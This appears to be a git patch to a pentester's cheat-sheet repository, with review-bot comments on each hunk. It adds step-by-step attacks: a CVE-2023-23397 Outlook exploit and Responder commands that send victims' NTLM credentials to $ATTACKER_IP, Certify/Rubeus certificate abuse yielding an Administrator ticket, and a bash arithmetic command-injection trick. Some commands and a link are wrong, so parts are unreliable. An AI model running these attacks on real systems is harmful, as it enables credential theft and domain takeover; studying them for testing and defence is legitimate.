From f1668bdc2a719d3ded69ece4e32d5598239595c6 Mon Sep 17 00:00:00 2001 From: whx Date: Sat, 25 Mar 2023 15:31:51 +0100 Subject: [PATCH] bump --- Cryptography/GPG-Cheatsheet.md | 12 +++++++ Cryptography/References.md | 1 + Enumeration/Websites.md | 13 ++++++++ Exploits/Linux/Bash.md | 14 ++++++++ Exploits/Windows/Outlook.md | 33 +++++++++++++++++++ Exploits/Windows/Responder.md | 30 +++++++++++++++++ .../Active Directory/ad_enumeration.md | 20 +++++++++++ Miscellaneous/References.md | 6 ++++ Post Exploitation/Windows/Windows PrivEsc.md | 1 + 9 files changed, 130 insertions(+) create mode 100644 Exploits/Linux/Bash.md create mode 100644 Exploits/Windows/Outlook.md diff --git a/Cryptography/GPG-Cheatsheet.md b/Cryptography/GPG-Cheatsheet.md index 2c0031e..f659453 100644 --- a/Cryptography/GPG-Cheatsheet.md +++ b/Cryptography/GPG-Cheatsheet.md @@ -1,5 +1,12 @@ # GPG Cheatsheet +## Generate Keypair + +* Generating a keypair via gpg +```sh +gpg --gen-key +``` + ## Encryption via GPG * Encryption of a file via gpg @@ -21,4 +28,9 @@ gpg --armor --symmetric --cipher-algo $PLAIN_TEXT gpg --output original_message.txt --decrypt $CIPHER ``` +## Encrypt & Sign an eMail +* Encryption and siging via gpg is done in the following way +```sh +gpg --encrypt --sign --armor -r bill.gates@microsoft.com message.txt +``` diff --git a/Cryptography/References.md b/Cryptography/References.md index 363480e..73ecc36 100644 --- a/Cryptography/References.md +++ b/Cryptography/References.md @@ -7,6 +7,7 @@ ### Online Tools +* [SSLshopper](https://www.tryhackme.com/) * [cryptool](https://cryptool.org) * [quipquip](https://quipquip.com) * [cryptii](https://cryptii.com/) diff --git a/Enumeration/Websites.md b/Enumeration/Websites.md index 82c74ad..e89d673 100644 --- a/Enumeration/Websites.md +++ b/Enumeration/Websites.md 
@@ -14,18 +14,31 @@ ### Fuzz Faster U Fool +* Simple Fuzzing ```sh ffuf -u http:///FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt ``` + * Fuzz dirs ```sh ffuf -u http:///FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt ``` + * Fuzz files ```sh ffuf -u http:///FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.txt ``` +* Fuzz all existing websites regardless of HTTP status +```sh +ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://$IP/FUZZ -fs 0 -mc all +``` + +* Fuzz with other HTTP methods like POST +```sh +ffuf -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://$IP/FUZZ -fs $SIZE -mc all -C POST +``` + #### Fuzz parameters ```sh diff --git a/Exploits/Linux/Bash.md b/Exploits/Linux/Bash.md new file mode 100644 index 0000000..9b4e275 --- /dev/null +++ b/Exploits/Linux/Bash.md @@ -0,0 +1,14 @@ +# Bash Exploit Possibilities + +## Eval + + +## Test + +Test includes `-eq`. It can be used to execute code which is evaluated before the comparison. [Vidarholen](https://www.vidarholen.net/contents/blog/?p=716) show examples on how to do it. +An example is the following +```sh +num=a[$(date >&2)]+42 +``` + +`date` get executed and the test `[[ $num -eq 42 ]]` gets evaluated to true diff --git a/Exploits/Windows/Outlook.md b/Exploits/Windows/Outlook.md new file mode 100644 index 0000000..55690a4 --- /dev/null +++ b/Exploits/Windows/Outlook.md 
@@ -0,0 +1,33 @@ +# Outlook Exploits + +## CVE-2023-23397 + +Create an Appointment with a custom and malicious reminder sound. The sound file download uses __Universal Naming Convention (UNC)__ paths to refrence the file. The file is stored on a server controlled by the attacker. Goal is to get the NTLM(v2) Hashes. There needs to be no interaction by the target. + + +Therefore, __PidLidReminderFileParameter__ have to be altered containing the UNC, for example `\\$ATTACKER_IP:$ATTACKER_PORT\payload.wav`. The source of the file may use __SMB__ or __WebDAV__. +Further, __PidLidReminderOverride__ has to be set to __true__. + +### Usage + +`New Appointment` --> set `Reminder` to 0 minutes. + +`Outlook Spy` plugin is needed. Go to `OutlookSpy` tab, press `CurrentItem` and go to `Script` + +Set the following variables: + +```vbscript +AppointmentItem.ReminderOverrideDefault = true +AppointmentItem.ReminderPlaySound = true +AppointmentItem.ReminderSoundFile = "\\$ATTACKER_IP\payloads\alert.wav" +``` + +* Set up `responder -I ` to catch the NTLM hash. + +Press `Run` to save the variables. Send the appointment afterwards. + +### Resources + +* [api0cradle's Powershell POC](https://github.com/api0cradle/CVE-2023-23397-POC-Powershell.git) + + diff --git a/Exploits/Windows/Responder.md b/Exploits/Windows/Responder.md index 1eae577..f1c2c9a 100644 --- a/Exploits/Windows/Responder.md +++ b/Exploits/Windows/Responder.md 
@@ -5,6 +5,36 @@ Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication ## Usage + +### Grab NTLM Token + +* Setup responder ```sh responder -I tun0 -wrvd ``` + +* Open an Shell on the windows target and request the attacker's SMB a.k.a responder +```sh +dir \\$ATTACKER_IP\C$ +``` + + +### Impersonate Domain -- Change Responder's certificates + +* After using nsupdate to add the attacker as a subdomain do the following tasks +* Add a certificate and its private key to +```sh +/usr/share/responder/certs +``` +* Edit `Responder.conf` +``` +[HTTPS Server] + +; Configure SSL Certificates to use +SSLCert = certs/cert.pem +SSLKey = certs/key.pem +``` +* Start responder +```sh +responder -I +``` diff --git a/Miscellaneous/Active Directory/ad_enumeration.md b/Miscellaneous/Active Directory/ad_enumeration.md index e2d88d5..6771e93 100644 --- a/Miscellaneous/Active Directory/ad_enumeration.md +++ b/Miscellaneous/Active Directory/ad_enumeration.md @@ -115,3 +115,23 @@ bloodhound --no-sandbox ## PowerView ## WMI + +## Find Certifications and Private Keys + +Certification Services can be found with [the Certify tool](https://github.com/GhostPack/Certify.git). + +* Enumerate vunerabilities on the current user via Certify, use `FullName` found in the first step to insert domain in the second step +```sh +Certify.exe find /vulnerable /currentuser +.\Certify.exe request /ca:$FULL_NAME /template:UserAuthentication /altname:Administrator +``` + +* Copy the found key and convert it like mentioned in the last line of the ouptut, for example +```sh +openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx +``` + +* Get ticket with the the loot via Rubeus +``` +.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials +``` 
diff --git a/Miscellaneous/References.md b/Miscellaneous/References.md index 1dacb8e..2506a38 100644 --- a/Miscellaneous/References.md +++ b/Miscellaneous/References.md @@ -1,4 +1,10 @@ # Miscellaneous References ## Static Binaries + [andrew-d's statically compiles binary compilation](https://github.com/andrew-d/static-binaries.git) + +## SuperTool + +* [SuperTool](https://mxtoolbox.com/SuperTool.aspx) + diff --git a/Post Exploitation/Windows/Windows PrivEsc.md b/Post Exploitation/Windows/Windows PrivEsc.md index c76930e..6d6d2cb 100644 --- a/Post Exploitation/Windows/Windows PrivEsc.md +++ b/Post Exploitation/Windows/Windows PrivEsc.md @@ -9,6 +9,7 @@ * [privescheck](https://github.com/itm4n/PrivescCheck) * [windows exploit suggester](https://github.com/bitsadmin/wesng) * [hacktricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation) +* [Privilege Escalation Runbook](https://xorond.com/posts/2021/04/windows-local-privilege-escalation/) ## Account Types
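Review bot: In the `Generate Keypair` hunk of `Cryptography/GPG-Cheatsheet.md`, `gpg --gen-key` only asks for name and e-mail and takes GnuPG's defaults for algorithm, key size and expiry; for a cheatsheet it is worth listing `gpg --full-generate-key` next to it, which prompts for those choices and is what most readers will actually want when they need a specific algorithm or an expiry date.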
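Review bot: In the `Encrypt & Sign an eMail` hunk of `Cryptography/GPG-Cheatsheet.md`, "siging" should read "signing", and the heading promises e-mail while the command `gpg --encrypt --sign --armor -r bill.gates@microsoft.com message.txt` encrypts a local file and writes `message.txt.asc`; say so, and add the two caveats a user hits first: `-r` only works once the recipient's public key has been imported (and either validated or used with `--trust-model always`), and `--sign` picks the default secret key unless `-u <key-id>` is given.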
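Review bot: In the `Online Tools` hunk of `Cryptography/References.md`, the link text and target disagree: `* [SSLshopper](https://www.tryhackme.com/)` points at tryhackme.com, which is not SSL Shopper. Either fix the URL (the SSL Shopper certificate and CSR tools live at https://www.sslshopper.com/) or change the label to match the site actually linked.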
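Review bot: In the `Fuzz Faster U Fool` hunk of `Enumeration/Websites.md`, the last example uses the wrong flag: `-C POST` is not an ffuf option (ffuf uses lowercase `-c` for coloured output, which the same line already passes), the HTTP method is selected with `-X POST`, so the line should read `ffuf -c -w ... -u http://$IP/FUZZ -fs $SIZE -mc all -X POST`. The bullet "Fuzz all existing websites regardless of HTTP status" describes paths on one host, not websites; "Fuzz all existing paths regardless of HTTP status" is what `-mc all -fs 0` does (match every status code, drop only empty bodies). The unchanged context lines still read `http:///FUZZ` without a host, so they would not run as written either.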
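Review bot: In the new `Exploits/Linux/Bash.md`, the `## Eval` section is empty, so either fill it or drop the heading until there is content. The `## Test` heading and "Test includes `-eq`" are misleading: the builtin `test` / `[` does not arithmetically expand its `-eq` operands (it fails with "integer expression expected" on a non-integer), the expansion that runs the embedded command happens in `[[ ... -eq ... ]]`, `(( ))`, `let` and `declare -i`, so name those constructs and point readers to `[ "$num" -eq 42 ]` as the safe form. Grammar: "Vidarholen show examples" should be "shows", "`date` get executed" should be "gets executed". The final claim that `[[ $num -eq 42 ]]` then "gets evaluated to true" should be re-checked on a current bash, since `$(date >&2)` sends its output to stderr and therefore contributes an empty array subscript; the claim that is reliably true, and the one that matters, is that `date` executes during the comparison.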
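Review bot: In the new `Exploits/Windows/Outlook.md`, the two UNC examples disagree and the first one is not a valid form: `\\$ATTACKER_IP:$ATTACKER_PORT\payload.wav` uses a `host:port` syntax Windows does not accept in UNC paths (SMB always goes to TCP 445, and the WebDAV redirector expresses a port as `\\host@port\path`), while the script later uses `\\$ATTACKER_IP\payloads\alert.wav`; keep one consistent form and show the `@port` variant for WebDAV. Typos and wording: "refrence" should be "reference", "There needs to be no interaction by the target" should be "No interaction by the target is required", and the plugin is named both `Outlook Spy` and `OutlookSpy`. What Responder receives is the Net-NTLMv2 challenge/response, which can be cracked offline or relayed, not the account's NT hash, so "NTLM(v2) Hashes" should say that. Finally, document that this only fires on Outlook builds without the March 2023 security update that fixed CVE-2023-23397, otherwise the procedure is followed against patched targets with no result.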
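Review bot: In the `Usage` hunk of `Exploits/Windows/Responder.md`, the new heading `### Grab NTLM Token` names the wrong artefact: Responder captures a Net-NTLMv2 challenge/response for offline cracking or relay, not a token or NT hash, so "Capture Net-NTLMv2 hash" is the accurate heading. "Open an Shell on the windows target" should read "Open a shell on the Windows target", and it is worth saying that any share name in `dir \\$ATTACKER_IP\C$` triggers the authentication attempt; `C$` is not required. In the `Impersonate Domain` section, "After using nsupdate to add the attacker as a subdomain" should state what record is added (an A record for the attacker's host in the target's DNS zone) so the step is reproducible, and the final `responder -I` still lacks the interface argument.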
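Review bot: In the `Find Certifications and Private Keys` hunk of `Miscellaneous/Active Directory/ad_enumeration.md`, `/template:UserAuthentication` is the template name from one lab's `find /vulnerable` output, not a general value, so make it a placeholder (`/template:$TEMPLATE`) and say it comes from the first command's output, as is already done for `/ca:$FULL_NAME`; what this abuses is an ESC1-style template (enrollee supplies the subject, client-authentication EKU), which the section should name. The `openssl pkcs12 ... -export -out cert.pfx` step prompts for an export password, so the Rubeus line needs `/password:` to match, and `/ptt` if the TGT is to be used in the current session. Wording: "Certifications" and "Certification Services" should be "Certificates" and "Active Directory Certificate Services (AD CS)", "vunerabilities" should be "vulnerabilities", "ouptut" should be "output", "the the loot" should be "the loot", and the two Certify commands mix `Certify.exe` and `.\Certify.exe` prefixes.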